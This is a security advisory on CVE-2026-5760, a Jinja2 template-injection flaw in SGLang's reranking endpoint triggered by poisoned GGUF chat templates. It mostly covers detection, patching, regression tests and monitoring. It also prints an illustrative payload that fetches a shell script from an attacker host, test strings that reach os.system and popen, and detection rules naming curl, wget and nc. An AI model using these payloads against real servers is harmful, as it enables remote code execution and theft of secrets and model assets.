Executive Summary
CVE-2026-5760 is a critical (CVSS 9.8) Server-Side Template Injection (SSTI) vulnerability in SGLang, a widely used open-source inference framework for large language models and multimodal AI models. By embedding a malicious Jinja2 payload inside a GGUF model's tokenizer.chat_template field, an attacker can execute arbitrary Python — and therefore arbitrary OS commands — on the hosting inference server the moment that model is loaded and a request hits the /v1/rerank endpoint. The attack requires no authentication and can be delivered entirely through poisoned models published on platforms like Hugging Face, making this a first-class AI supply chain threat.
1. What Is This Vulnerability?
SGLang is a high-performance, open-source framework for serving large language models (LLMs) and multimodal models. It exposes an OpenAI-compatible API surface and supports GGUF, the "GPT-Generated Unified Format" popularized by llama.cpp, as a model format.
The vulnerability resides in serving_rerank.py, the component responsible for SGLang's reranking endpoint (/v1/rerank). When processing a chat template sourced from a loaded GGUF model, SGLang renders it using the standard, unsandboxed jinja2.Environment class:
# VULNERABLE CODE (serving_rerank.py — SGLang ≤ 0.5.9)
from jinja2 import Environment
env = Environment()
template = env.from_string(model.chat_template)
rendered = template.render(messages=messages)
The Jinja2 Environment() class, by design, does not restrict access to Python builtins, object attributes, or class hierarchies. This is safe when the template source is trusted, but catastrophically dangerous when it originates from user-supplied content — such as the tokenizer.chat_template field embedded in an untrusted GGUF file.
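To see why unrestricted attribute access matters, the short sketch below walks the same kind of attribute chain in plain Python, outside any template. It is illustrative only: the helper name reachable_root is an assumption made for this example, and nothing here is SGLang or Jinja2 code.

```python
def reachable_root(value):
    """Follow value -> its class -> the last entry of the class's MRO."""
    # Every class's method resolution order ends at `object`.
    return value.__class__.__mro__[-1]


# Starting from nothing more than an empty string literal...
root = reachable_root("")

# ...every class that derives directly from `object` and is currently
# loaded in the interpreter can be enumerated by name.
loaded_class_names = {cls.__name__ for cls in root.__subclasses__()}

print(root is object)
print("int" in loaded_class_names)
```

An unsandboxed template can evaluate the same chain, which is why a harmless-looking string literal is enough of a foothold to reach arbitrary loaded classes.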
The correct approach is ImmutableSandboxedEnvironment, which strips access to dangerous Python internals:
# SAFE CODE
from jinja2.sandbox import ImmutableSandboxedEnvironment
env = ImmutableSandboxedEnvironment()
template = env.from_string(model.chat_template)
rendered = template.render(messages=messages)
Attack Vector
An attacker crafts a GGUF model file where tokenizer.chat_template contains a Jinja2 SSTI payload. A trigger phrase — specifically the string "The answer can only be 'yes' or 'no'" — is woven into the template to activate SGLang's internal Qwen3 reranker detection logic, which is the code path that calls the vulnerable template renderer.
A simplified, illustrative version of the payload looks like this (the arrow-function step is pseudocode rather than valid Jinja2 syntax):
{# Malicious tokenizer.chat_template #}
{% if 'The answer can only be \'yes\' or \'no\'' in messages[-1]['content'] %}
{{ ''.__class__.__mro__[1].__subclasses__()
| selectattr('__name__', 'equalto', 'Popen') | first
| (x -> x(['curl', 'https://attacker.com/shell.sh', '-o', '/tmp/s.sh'],
stdout=-1).communicate()) }}
{% endif %}
{{ messages | map(attribute='content') | join('\n') }}
When a victim loads this model and any request arrives at /v1/rerank, SGLang executes the template and the attacker's OS command runs with full inference server privileges.
Real-World Impact
While no confirmed in-the-wild exploitation campaign has been publicly attributed to this CVE as of April 2026, the attack surface is substantial:
- Thousands of GGUF models are hosted on public repositories such as Hugging Face, many downloaded tens of thousands of times per day.
- SGLang is used heavily in enterprise AI infrastructure, private AI clouds, and research clusters.
- A compromised inference server may expose GPU resources, API keys, training data, proprietary model weights, and internal network access.
- The CERT/CC has issued advisory VU#915947, highlighting the severity of the supply chain risk.
2. Who Is Affected?
| Factor | Details |
|---|---|
| Affected software | SGLang versions ≤ 0.5.9 |
| Vulnerable component | serving_rerank.py (/v1/rerank endpoint) |
| Trigger condition | Loading a GGUF model whose tokenizer.chat_template carries the payload and the reranker trigger phrase, AND a request reaching /v1/rerank |
| Attack authentication | None required — unauthenticated if /v1/rerank is internet-exposed |
| Deployment contexts at risk | Self-hosted SGLang servers, Kubernetes-based inference clusters, cloud GPU instances, Hugging Face Inference Endpoints using SGLang backends |
| Model distribution risk | Any org downloading GGUF models from unverified Hugging Face repos, model zoos, or community mirrors |
You are at risk if:
- You run SGLang version 0.5.9 or earlier
- You load GGUF models from public repositories without inspecting their tokenizer.chat_template
- Your SGLang /v1/rerank endpoint is accessible from the network (even internally)
3. How to Detect It (Testing)
Manual Testing Steps
Step 1 — Verify SGLang version:
pip show sglang | grep Version
# OR
python -c "import sglang; print(sglang.__version__)"
If the version is 0.5.9 or lower, the system is vulnerable.
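For fleets where the version string is collected centrally, the comparison can be scripted. The following is a minimal sketch, assuming the affected range stated in this advisory (0.5.9 and earlier); the names LAST_AFFECTED, parse_version, and is_affected are hypothetical, and suffixes such as .post1 or rc1 are deliberately ignored, so a suffixed build is treated as its base release.

```python
import re

# Assumption taken from this advisory: releases up to and including 0.5.9 are affected.
LAST_AFFECTED = (0, 5, 9)


def parse_version(version: str) -> tuple:
    """Extract the leading numeric release segment, e.g. '0.5.9.post1' -> (0, 5, 9)."""
    match = re.match(r"\d+(?:\.\d+)*", version.strip())
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    parts = [int(p) for p in match.group(0).split(".")]
    # Pad short versions so that '0.5' compares as (0, 5, 0).
    while len(parts) < len(LAST_AFFECTED):
        parts.append(0)
    return tuple(parts)


def is_affected(version: str) -> bool:
    """True when the numeric release is at or below the last affected release."""
    return parse_version(version)[: len(LAST_AFFECTED)] <= LAST_AFFECTED


print(is_affected("0.5.9"))
print(is_affected("0.5.10"))
```

Comparing integer tuples avoids the classic string-comparison trap in which "0.5.10" sorts before "0.5.9".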
Step 2 — Inspect GGUF model chat templates:
Use the GGUFReader class from the gguf Python package (the same package that provides gguf-dump) to extract and review embedded templates:
pip install gguf
python -c "
import gguf
reader = gguf.GGUFReader('your_model.gguf')
for field in reader.fields.values():
    if 'chat_template' in field.name:
        print(field.name, bytes(field.parts[-1]).decode('utf-8'))
"
Look for any Jinja2 constructs involving __class__, __mro__, __subclasses__, subprocess, os.system, Popen, eval, exec, or __import__.
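The manual review above can be partly automated once the template text has been extracted. Below is a minimal sketch of a denylist scanner over a template string; the function and constant names are hypothetical, and the list of names simply mirrors the constructs listed in this step. A denylist like this is easy to evade (for example through string concatenation), so treat it as a triage aid rather than a substitute for sandboxed rendering.

```python
import re

# Names listed in the step above, matched as whole identifiers only.
SUSPICIOUS_NAMES = [
    "__class__", "__mro__", "__subclasses__", "__import__",
    "subprocess", "os.system", "Popen", "eval", "exec",
]

# The lookarounds stop 'exec' from matching inside 'execute', and so on.
_PATTERN = re.compile(
    "|".join(
        r"(?<![A-Za-z0-9_])" + re.escape(name) + r"(?![A-Za-z0-9_])"
        for name in SUSPICIOUS_NAMES
    )
)


def find_suspicious_constructs(template: str) -> list:
    """Return the distinct suspicious names found, in order of first appearance."""
    found = []
    for match in _PATTERN.finditer(template):
        if match.group(0) not in found:
            found.append(match.group(0))
    return found


sample = "{{ ''.__class__.__mro__[1].__subclasses__() }}"
print(find_suspicious_constructs(sample))
```

Any non-empty result is a reason to quarantine the model for manual inspection before it is loaded.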
Step 3 — Test the vulnerable code path directly:
On a sandboxed/isolated server, send a reranking request with the trigger phrase:
curl -X POST http://localhost:30000/v1/rerank \
-H "Content-Type: application/json" \
-d '{
"model": "your-loaded-model",
"query": "The answer can only be '\''yes'\'' or '\''no'\''",
"documents": ["test document one", "test document two"]
}'
Monitor server-side for unexpected subprocess creation or outbound network connections.
Automated Scanning
Tool: Snyk / Snyk CLI
snyk test --all-projects
# Look for: CVE-2026-5760 in sglang dependency tree
Tool: pip-audit
pip install pip-audit
pip-audit
# Expected output for vulnerable installs:
# sglang 0.5.9 CVE-2026-5760 GHSA-XXXX-XXXX
Tool: OSV-Scanner (Google)
osv-scanner --lockfile requirements.txt
# Or scan the full Python environment:
osv-scanner -r /path/to/project
Tool: Trivy (container/image scanning)
trivy image your-sglang-docker-image:tag
# Filter for: CVE-2026-5760
Code Review Checklist
- Search for from jinja2 import Environment in any file related to model serving or template rendering (unsafe pattern)
- Verify ImmutableSandboxedEnvironment or SandboxedEnvironment is used everywhere Jinja2 renders model-supplied templates
- Confirm tokenizer.chat_template values are validated or stripped of dangerous constructs before rendering
- Check that no GGUF model loading path passes raw chat_template fields directly into a Jinja2 render call
- Audit any /v1/rerank or similar endpoint for input sanitization gaps
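The first two checklist items can be approximated with a small static check. The sketch below uses Python's standard ast module to report where a source file constructs the plain jinja2 Environment; the function name is hypothetical, and the check only follows direct imports (from jinja2 import Environment, import jinja2), so re-exports or dynamic imports would be missed.

```python
import ast


def find_unsandboxed_environments(source: str, filename: str = "<string>") -> list:
    """Return line numbers of calls that construct jinja2's plain Environment."""
    tree = ast.parse(source, filename=filename)

    # Collect local names bound to jinja2.Environment and to the jinja2 module.
    env_names = set()
    module_names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.ImportFrom) and node.module == "jinja2":
            for alias in node.names:
                if alias.name == "Environment":
                    env_names.add(alias.asname or alias.name)
        elif isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name == "jinja2":
                    module_names.add(alias.asname or alias.name)

    hits = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        if isinstance(func, ast.Name) and func.id in env_names:
            hits.append(node.lineno)  # Environment(...)
        elif (
            isinstance(func, ast.Attribute)
            and func.attr == "Environment"
            and isinstance(func.value, ast.Name)
            and func.value.id in module_names
        ):
            hits.append(node.lineno)  # jinja2.Environment(...)
    return sorted(hits)


vulnerable = "from jinja2 import Environment\nenv = Environment()\n"
print(find_unsandboxed_environments(vulnerable))
```

Working on the syntax tree rather than raw text means aliased imports are caught and comments or strings that merely mention Environment are not flagged.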
4. How to Fix It (Mitigation)
Step-by-Step Remediation
- Upgrade SGLang as soon as a release that includes the sandboxed Jinja2 fix is available. Monitor the SGLang GitHub releases page: as of disclosure, no official patched version was available, which makes the workarounds below critical.
- Apply the Jinja2 sandbox fix manually if a patched SGLang release is unavailable. Locate serving_rerank.py in your SGLang installation:
    find $(python -c "import sglang; import os; print(os.path.dirname(sglang.__file__))") -name "serving_rerank.py"
- Replace the unsandboxed Environment:
    # BEFORE (vulnerable)
    from jinja2 import Environment
    env = Environment()
    # AFTER (safe)
    from jinja2.sandbox import ImmutableSandboxedEnvironment
    env = ImmutableSandboxedEnvironment()
- Audit all other Jinja2 usages in the codebase for the same pattern. Any Environment() that renders external input is a candidate for the same class of vulnerability.
- Restart the SGLang service after applying the patch:
    systemctl restart sglang
    # OR for containerized deployments:
    kubectl rollout restart deployment/sglang-server
- Rotate credentials and secrets exposed on any inference servers that loaded models from unverified sources, as a precaution against prior exploitation.
Code Fix Example
# serving_rerank.py: BEFORE (CVE-2026-5760 vulnerable)
from jinja2 import Environment

def apply_chat_template(tokenizer, messages):
    env = Environment()  # No sandboxing; arbitrary code execution possible
    template = env.from_string(tokenizer.chat_template)
    return template.render(messages=messages)

# serving_rerank.py: AFTER (patched)
from jinja2.sandbox import ImmutableSandboxedEnvironment

def apply_chat_template(tokenizer, messages):
    env = ImmutableSandboxedEnvironment()  # Sandboxed; Python builtins blocked
    template = env.from_string(tokenizer.chat_template)
    return template.render(messages=messages)
ImmutableSandboxedEnvironment treats underscore-prefixed attributes such as __class__, __mro__, __subclasses__, and __builtins__ as unsafe, which closes off the escape vectors that typical SSTI payloads rely on. Chaining through or calling such an attribute raises a SecurityError, so the render fails instead of executing attacker code.
Configuration Hardening
Network-level controls (immediate risk reduction):
# Block external access to the SGLang port with iptables.
# Rules are evaluated in order, so the ACCEPT for internal sources must come before the DROP:
iptables -A INPUT -p tcp --dport 30000 -s 10.0.0.0/8 -j ACCEPT # Allow only internal
iptables -A INPUT -p tcp --dport 30000 -j DROP
# OR restrict with nginx reverse proxy:
location /v1/rerank {
allow 10.0.0.0/8;
deny all;
proxy_pass http://localhost:30000;
}
SGLang server startup flags:
# Bind only to localhost to prevent external exposure:
python -m sglang.launch_server \
--model-path ./your_model.gguf \
--host 127.0.0.1 \
--port 30000
Container security (drop capabilities, read-only FS):
# In your Kubernetes pod spec:
securityContext:
  runAsNonRoot: true
  readOnlyRootFilesystem: true
  allowPrivilegeEscalation: false
  capabilities:
    drop: ["ALL"]
5. How to Test the Fix (Validation)
Regression Test Scenarios
- Scenario A: Load a GGUF model with a benign tokenizer.chat_template and confirm /v1/rerank returns correct rankings (no functionality regression).
- Scenario B: Load a GGUF model with a crafted malicious Jinja2 SSTI payload in tokenizer.chat_template and send the trigger request. Confirm the server returns a SecurityError or HTTP 500/400 without executing any subprocess.
- Scenario C: Send standard reranking requests with the trigger phrase in the query but with a benign model loaded, and confirm no unexpected behavior.
Security Test Cases
Test Case 1: SSTI payload is blocked by sandboxed environment
- Precondition: Apply Jinja2 ImmutableSandboxedEnvironment fix
- Steps: Load a model with tokenizer.chat_template = "{{ ''.__class__.__mro__[1].__subclasses__() }}", send a POST to /v1/rerank
- Expected Result: Server raises jinja2.exceptions.SecurityError: access to attribute '__class__' of 'str' object is unsafe, no code executed
Test Case 2: Outbound connection from exploit payload does not succeed
- Precondition: Apply fix
- Steps: Load a model with a curl-based SSTI exfiltration payload; monitor network with tcpdump -i any dst port 443
- Expected Result: No outbound connections to attacker-controlled hosts
Test Case 3: Normal reranking continues to work
- Precondition: Apply fix, legitimate model loaded
- Steps: POST {"query": "cybersecurity", "documents": ["doc1", "doc2"]} to /v1/rerank
- Expected Result: HTTP 200, valid ranking scores returned
Automated Tests
# test_cve_2026_5760.py: security regression test
import pytest
from jinja2.sandbox import ImmutableSandboxedEnvironment
# SecurityError lives in jinja2.exceptions; it is not exported from the top-level package.
from jinja2.exceptions import SecurityError

MALICIOUS_TEMPLATES = [
    "{{ ''.__class__.__mro__[1].__subclasses__() }}",
    "{% for x in ().__class__.__base__.__subclasses__() %}{{ x.__name__ }}{% endfor %}",
    "{{ self.__init__.__globals__['__builtins__']['__import__']('os').system('id') }}",
    "{{ lipsum.__globals__['os'].popen('id').read() }}",
]

def test_ssti_payloads_blocked_by_sandbox():
    env = ImmutableSandboxedEnvironment()
    for payload in MALICIOUS_TEMPLATES:
        # Each payload must fail during rendering rather than execute.
        with pytest.raises(SecurityError):
            template = env.from_string(payload)
            template.render()

def test_legitimate_template_renders_correctly():
    env = ImmutableSandboxedEnvironment()
    template = env.from_string(
        "{% for msg in messages %}{{ msg.role }}: {{ msg.content }}\n{% endfor %}"
    )
    result = template.render(messages=[
        {"role": "user", "content": "Is the sky blue?"},
        {"role": "assistant", "content": "Yes."}
    ])
    assert "user: Is the sky blue?" in result
    assert "assistant: Yes." in result
Run the test suite:
pytest test_cve_2026_5760.py -v
6. Prevention & Hardening
Best Practices
AI Model Supply Chain Controls:
- Only load GGUF models from organizationally vetted, internal model registries. Mirror approved models internally rather than downloading directly from Hugging Face during production deployments.
- Implement a model vetting pipeline that extracts and statically analyzes tokenizer.chat_template for dangerous Jinja2 constructs before any model is deployed.
- Use cryptographic model signing and verify signatures before loading. Tools like sigstore can be adapted for model artifact signing.
- Apply the "principle of least trust" to all external model assets: treat them like untrusted user input.
Jinja2 Hardening in AI Frameworks:
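- Audit every place in your ML serving infrastructure where Jinja2 renders externally sourced templates. Use ImmutableSandboxedEnvironment universally for any template content that isn't 100% developer-controlled.
- Add a grep-based CI check to flag unsafe Jinja2 Environment usage. The pattern covers both the from-import form used in the vulnerable code and the fully qualified call, and the if form keeps the step from failing when grep finds nothing:
    # In CI pipeline:
    if grep -rnE "from jinja2 import .*Environment|jinja2\.Environment\(" ./src --include="*.py"; then echo "FAIL: Unsandboxed Jinja2 found"; exit 1; fi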
Network Segmentation:
- Never expose SGLang's API port (default: 30000) directly to the internet or untrusted networks. Place it behind an authenticated API gateway or reverse proxy.
- Apply egress filtering on inference servers — they should not need to initiate outbound connections to arbitrary internet hosts.
Runtime Isolation:
- Run inference servers in minimal containers with read-only filesystems and dropped Linux capabilities. Even if RCE occurs, a contained environment dramatically limits blast radius.
- Use seccomp profiles to restrict the system calls available to the inference process:
    securityContext:
      seccompProfile:
        type: RuntimeDefault
Monitoring & Detection
Indicators of Compromise (IoCs):
- Unexpected subprocess execution from the SGLang process (e.g., curl, wget, bash, sh); monitor with auditd or eBPF-based tools like Falco
- Outbound network connections from the inference server to unknown external IPs
- New files created in /tmp, /dev/shm, or world-writable directories by the SGLang process
- Unusual CPU/network spikes following GGUF model loads
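For quick triage of the file-based indicator above, a short script can list files that changed recently in the directories of interest. This is a minimal sketch using only the standard library; the function name and the one-hour window in the usage line are assumptions, it inspects only the top level of each directory, and it uses modification time as a stand-in for creation time. It cannot attribute a file to the SGLang process, so results still need to be correlated with process-level logs.

```python
import os
import time


def recently_modified_files(directories, max_age_seconds, now=None):
    """Return sorted paths of regular files modified within max_age_seconds."""
    now = time.time() if now is None else now
    recent = []
    for directory in directories:
        try:
            entries = list(os.scandir(directory))
        except OSError:
            continue  # directory missing or unreadable; skip it
        for entry in entries:
            try:
                if not entry.is_file(follow_symlinks=False):
                    continue
                mtime = entry.stat(follow_symlinks=False).st_mtime
            except OSError:
                continue  # file vanished between listing and stat
            if now - mtime <= max_age_seconds:
                recent.append(entry.path)
    return sorted(recent)


# Example: anything touched in /tmp or /dev/shm during the last hour.
for path in recently_modified_files(["/tmp", "/dev/shm"], 3600):
    print(path)
```

Running this shortly after a new GGUF model is loaded, and comparing against a baseline taken before the load, narrows down what deserves a closer look.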
Falco rule to detect suspicious subprocess spawning:
- rule: SGLang Spawns Shell
  desc: Detects shell or curl execution spawned from an SGLang inference process
  condition: >
    spawned_process and
    proc.pname in (sglang, python3, uvicorn) and
    proc.name in (bash, sh, curl, wget, nc, ncat, python3)
  output: "SGLang spawned suspicious process (proc=%proc.name parent=%proc.pname cmd=%proc.cmdline)"
  priority: CRITICAL
Model load audit logging: Log the SHA-256 hash of every GGUF model loaded and cross-reference against your approved model registry:
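import hashlib

# Placeholder allowlist: populate with SHA-256 digests from your approved model registry.
APPROVED_MODEL_HASHES = set()

def audit_model_load(model_path: str) -> str:
    sha256 = hashlib.sha256()
    # Hash the file in 64 KiB chunks so large models are never fully held in memory.
    with open(model_path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            sha256.update(chunk)
    digest = sha256.hexdigest()
    # Compare against the allowlist. An explicit raise is used instead of assert,
    # because assert statements are skipped when Python runs with -O.
    if digest not in APPROVED_MODEL_HASHES:
        raise PermissionError(f"Unapproved model hash: {digest}")
    return digest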
References
- CVE Entry: CVE-2026-5760 — NVD
- CERT/CC Advisory: VU#915947 — SGLang RCE via Chat Templates
- Original Disclosure: The Hacker News — SGLang CVE-2026-5760
- Technical Deep Dive: Vulert Blog — SGLang CVE-2026-5760 RCE
- GBHackers Analysis: Malicious GGUF Models Could Trigger RCE on SGLang Servers
- CyberSecurityNews Coverage: Hackers Weaponize GGUF Models
- PT Security Database: CVE-2026-5760 Code Injection in SGLang
- Jinja2 Sandboxing Docs: Jinja2 Sandbox Environment — Pallets
- SGLang GitHub: github.com/sgl-project/sglang
- GGUF Format Spec: GGUF Documentation — ggerganov/ggml